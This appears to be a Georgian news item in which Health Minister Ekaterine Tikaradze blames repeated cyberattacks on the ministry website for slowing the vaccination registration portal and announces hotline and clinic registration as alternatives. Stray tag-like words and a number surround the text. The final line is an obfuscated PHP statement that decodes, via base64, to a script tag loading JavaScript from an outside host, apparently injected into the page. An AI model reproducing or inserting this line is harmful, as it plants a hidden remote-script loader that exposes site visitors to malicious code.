celsiusi
ავერსი შნაიდერი
ჯანდაცვის მინისტრი ეკატერინე ტიკარაძე ვაქცინაციის პორტალის შეფერხებით მუშაობას ეხმაურება და ამბობს, რომ სამინისტროს ვებგვერდზე არაერთი კიბერთავდასხმა განხორციელდა, რაც პროცესს აფერხებს.
 
„როგორც იცით, ჯანდაცვის სამინისტროზე განხორციელდა არაერთი კიბერთავდასხმა, რომელიც, რა თქმა უნდა, ამ პროცესს აფერხებს. სწორედ აქედან გამომდინარე, გადავწყვიტეთ, რომ მოქალაქეებისთვის გარდა ერთი წყაროსი, რომელიც არის პორტალით რეგისტრაცია, მივცეთ რეგისტრაციის დამატებითი საშუალება, რაც არის სამინისტროს ცხელი ხაზი, ასევე კლინიკების ცხელი ხაზები, ასევე მოქალაქეებს მივეცით ვირტუალური ოთახის საშუალებით, კლინიკაში, თავისუფალი რიგით დარეგისტრირება-აცრის საშუალება. ვთვლით, რომ პრობლემები, რაც დღეს ვებგვერდთან მიმართებით გვაქვს, ეფექტიანად უნდა მოგვარდეს“, - განაცხადა ტიკარაძემ.
1322
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");